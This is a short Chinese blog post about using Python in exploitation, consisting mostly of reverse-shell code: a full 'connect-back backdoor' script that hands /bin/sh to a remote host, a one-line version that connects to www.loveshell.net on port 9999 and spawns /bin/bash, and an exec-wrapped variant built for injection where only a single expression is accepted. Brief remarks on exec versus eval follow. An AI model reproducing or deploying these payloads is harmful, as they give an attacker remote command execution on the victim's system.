当前位置 博文首页 > 在漏洞利用Python代码真的很爽

最大化 缩小

    在漏洞利用Python代码真的很爽

    作者:admin 时间:2021-02-02 15:11

    不知道怎么忽然想看这个,呵呵
    小我的python的反shell的代码
    #!/usr/bin/python
    # Python Connect-back Backdoor
    # Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
    # Version: 1.0
    # Date: July 15th 2006

    import sys
    import os
    import socket
    shell = "/bin/sh"

    def usage(programname):
      print "Python Connect-back Backdoor"
      print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
      print "Date: July 15th 2006\n"
      print "Usage: %s <conn_back_host> <port>\n" % programname

    def main():
      if len(sys.argv) != 3: 
        usage(sys.argv[0])
        sys.exit(1)

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      try: 
        s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
        print "[+] Connect ok." 
      except: 
        print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
        sys.exit(2)
      s.send("-------------------- Python Connect-back Backdoor --------------------\n")
      s.send("----------------------------- By wofeiwo -----------------------------\n")
      os.dup2(s.fileno(), 0)
      os.dup2(s.fileno(), 1)
      os.dup2(s.fileno(), 2)
      global shell
      os.system(shell)
      print "See U!"
      s.close()

    if __name__ == "__main__": main()



    用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

    import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");


    如何?很短了吧?
    不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
    exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';


    注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
    翻了下手册
    exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句



    eval语句用来计算存储在字符串中的有效Python表达式



    呵呵,这里用eval好象会出错.
    YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......
    js
上一篇:推荐下python/ironpython:从入门到精通
下一篇:没有了